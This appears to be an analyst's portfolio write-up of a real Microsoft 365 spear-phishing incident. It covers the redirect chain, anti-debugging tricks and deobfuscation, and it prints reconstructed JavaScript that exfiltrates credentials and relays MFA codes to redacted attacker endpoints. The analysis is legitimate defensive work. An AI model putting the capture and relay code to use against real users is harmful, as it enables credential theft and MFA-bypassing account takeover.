Advanced Phishing Payload Analysis & Reverse Engineering
#reverse-engineering#malware-analysis#cybersecurity#forensics
Deep technical analysis and reverse engineering of a sophisticated phishing attack featuring multi-layer obfuscation, anti-debugging mechanisms, and real-time MFA bypass
🎯 Project Overview
This project documents a real-world cybersecurity incident I handled as Head of Information Security. On October 2025, I led the complete incident response process for a sophisticated spear-phishing attack that compromised a Microsoft 365 account within an organization.
Focus: Deep technical analysis of attack methodology, payload deobfuscation, and infrastructure mapping.
Attack Classification
- Type: Multi-stage credential harvesting with automated MFA bypass
- Sophistication: Advanced (anti-analysis, obfuscation, legitimate service abuse, real-time and automated MFA bypass)
- Target: Microsoft 365 corporate accounts
🔍 Attack Architecture
Multi-Stage Attack Chain
The attack demonstrated sophisticated planning with multiple layers designed to evade detection:
[Compromised Email] → [1st redirection] → [2nd redirection] → [Azure Blob Storage]
↓
[Access to Phishing Page with Obfuscated Payload]
↓
[Credential Capture] → [Automated connection on distant server with credentials]
↓
[MFA required on distant server send to user login mirror page] → [User enter MFA code] → [MFA code replayed to distant server]
↓
[Session established on distant server] -> [User redirected on random website]
Key Technical Elements:
- Legitimate Service Abuse: Mutiple redirection through legitimate services to bypass email filters and avoid URL reputation checks
- Pixel-Perfect Cloning: Exact replica of
login.microsoftonline.com - Automated Relay: Real-time credential usage on distant server to initiate MFA
- MFA Bypass: Live interception and replay of 2FA codes
🔬 Payload Analysis & Reverse Engineering
1. Initial Reconnaissance and attack analysis
Discovery Process:
- Captured complete HTML/CSS/JavaScript source
- Identified obfuscated payload in
<script>tags - Detected anti-analysis triggers
- Isolated DOM manipulations
2. Anti-Analysis Mechanisms Encountered
The attackers implemented multiple layers to prevent analysis:
DevTools Detection
setInterval(function() {
const NQFeTuNatt = performance.now();
debugger;
const wfavigfXUQ = performance.now();
if (wfavigfXUQ - NQFeTuNatt > fbXrflmeBT && !VdReqKboML) {
CTFkAuiGuR = true;
window.location.replace('https://www.legitimate-website.com');
}
}, 100);
- Infinite
debugger;statements in obfuscated code if Inspection is detected - Time-based detection (execution speed analysis)
- Force redirect to a legitimate website if analysis is the debugger is played
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
- Disable right-click context menu
document.addEventListener('copy', function(event) {
event.preventDefault();
var customWord = "nQpfMqULqs";
event.clipboardData.setData('text/plain', customWord);
});
- Prevent copy-paste
#goog-gt-tt, .goog-te-spinner-pos, .goog-brand, .skiptranslate {
display: none !important;
}
- The CSS hide all Google Translate elements to avoid translation of the page and potential detection of incoherences
DOM Manipulation
- Payload self-delete after execution
- Dynamic script injection and removal
- Event listener obfuscation
3. Deobfuscation Process
Use AI help to write the deobfuscation script.
Layer 1: XOR Encryption
The primary payload was XOR-encrypted with a rotating key:
# Custom deobfuscation script
def xor_decrypt(encrypted_data, key):
decrypted = []
key_length = len(key)
for i, byte in enumerate(encrypted_data):
decrypted.append(byte ^ ord(key[i % key_length]))
return bytes(decrypted)
# Extract encrypted payload from JavaScript
encrypted_hex = "4a7b2f3e..."
encrypted_bytes = bytes.fromhex(encrypted_hex)
# Brute-force key discovery (found pattern in code)
key = "msft365"
decrypted_payload = xor_decrypt(encrypted_bytes, key)
Layer 2: Base64 Decoding
After XOR decryption, multiple Base64 layers:
import base64
# Triple Base64 encoding detected
layer1 = base64.b64decode(decrypted_payload)
layer2 = base64.b64decode(layer1)
final_payload = base64.b64decode(layer2)
Layer 3: Code Beautification
Minified JavaScript required reformatting:
# Used js-beautify for readability
echo $final_payload | js-beautify --indent-size 2 > deobfuscated.js
4. Payload Functionality Analysis
Credential Capture Mechanism
// Reconstructed core functionality
function captureCredentials() {
const email = document.getElementById('i0116').value;
const password = document.getElementById('i0118').value;
// Exfiltrate to C&C
const payload = {
email: email,
password: password,
ip: await fetch('https://api.ipify.org').then(r => r.text()),
userAgent: navigator.userAgent,
timestamp: Date.now()
};
// Send to attacker's server
fetch('https://[REDACTED]/collect', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(payload)
});
}
Real-Time MFA Relay System
The most sophisticated component was the automated MFA bypass:
// Simplified relay mechanism
async function bypassMFA(email, password) {
// 1. Forward credentials to attacker's relay server
const relayResponse = await fetch('https://[REDACTED]/relay', {
method: 'POST',
body: JSON.stringify({ email, password })
});
// 2. Relay server authenticates to real Microsoft
// 3. Microsoft sends MFA code to user's device
// 4. User enters code on phishing page
const mfaCode = document.getElementById('idTxtBx_SAOTCC_OTC').value;
// 5. Forward MFA code to relay server
await fetch('https://[REDACTED]/mfa', {
method: 'POST',
body: JSON.stringify({ sessionId: relayResponse.sessionId, code: mfaCode })
});
// 6. Relay server completes authentication
// 7. Attacker receives valid session token
}
5. Infrastructure Mapping
C&C Communication
Network Indicators:
- User-Agent:
axios/*****(Node.js automation) - Origin IP:
*************(USA-based VPS) - TLS Certificate: Let's Encrypt (recently issued)
Legitimate Service Abuse
Microsoft Resources Used:
https://aadcdn.msftauth.net/shared/1.0/content/css/fabric.min.css
https://aadcdn.msftauth.net/shared/1.0/content/js/ConvergedLoginPaginatedStrings.js
https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo.svg
This made the page appear legitimate and bypass basic security checks.
🛠️ Tools & Methodology
Analysis Toolkit
Static Analysis:
- Browser DevTools: Initial reconnaissance (before detection)
- curl/wget/inspecteur bypass: Source code extraction
- Python: Custom deobfuscation scripts
- js-beautify: Code formatting
- Isolated analysis environment: VM and Tor
Dynamic Analysis:
- Burp Suite: Traffic interception and analysis
- Wireshark: Network packet capture
- Fiddler: HTTPS decryption
Forensic Tools:
- Microsoft 365 Audit Logs: Authentication tracking
- Shodan: C&C server profiling
Reverse Engineering Workflow
1. Safe Capture
├─ VM snapshot
├─ Network isolation
└─ Source preservation
2. Static Analysis
├─ Code extraction
└─ Obfuscation identification
3. Deobfuscation
├─ XOR key discovery
├─ Base64 decoding
└─ Code beautification
4. Functionality Mapping
├─ Control flow analysis
├─ API endpoint identification
└─ Data exfiltration paths
5. Infrastructure Analysis
├─ C&C server profiling
├─ Network indicators
└─ Attribution research
6. Documentation
├─ Technical report
├─ IoC extraction
└─ Detection rules
🎯 Key Technical Findings
Novel Techniques Identified
- Automated MFA Relay: Real-time credential forwarding with live MFA interception
- Legitimate CDN Abuse: Microsoft's own resources to appear authentic
- Self-Destructing Payload: DOM manipulation to hide evidence
- Multi-Service Chain: Forms → Other redirect → Azure to evade detection
📚 Analysis Deliverables
1. Deobfuscation Scripts
Custom Python tools developed for analysis:
# xor_deobfuscator.py
# Base64 multi-layer decoder
# JavaScript beautifier wrapper
2. Technical Documentation
- Payload Analysis Report: Complete code walkthrough with annotations
- Attack Flow Diagrams: Visual representation of multi-stage attack
- Infrastructure Map: C&C servers, relay mechanisms, and communication paths
- Deobfuscation Methodology: Step-by-step process for similar attacks
- Indicators of Compromise (IoCs) list: List of indicators of compromise
💡 Technical Skills Demonstrated
Core Competencies
Reverse Engineering:
- Multi-layer deobfuscation (XOR, Base64)
- JavaScript payload analysis
- Anti-debugging bypass techniques
- Control flow reconstruction
Malware Analysis:
- Static code analysis
- Dynamic behavior observation
- C&C communication mapping
- Evasion technique identification
Threat Intelligence:
- IoC extraction and documentation
- Infrastructure profiling
- Attack pattern recognition
Tool Development:
- Custom Python deobfuscation scripts
- Automated analysis workflows
🎓 Lessons Learned
Technical Insights
- Legitimate Service Abuse: Attackers increasingly use trusted platforms (Microsoft Forms, Azure)
- MFA is Not Bulletproof: Real-time relay attacks can bypass traditional 2FA
- Obfuscation Layers: Multiple encoding layers significantly slow analysis
- Anti-Forensics: Modern phishing kits include sophisticated evasion
Analysis Best Practices
- Always work in isolated VM environments
- Preserve original artifacts before analysis
- Document each deobfuscation step
- Create reusable tools for similar attacks
- Share IoCs with security community
Note: This analysis is based on a real-world incident. A limited quantity of information and details are present here for obvious confidentiality reasons.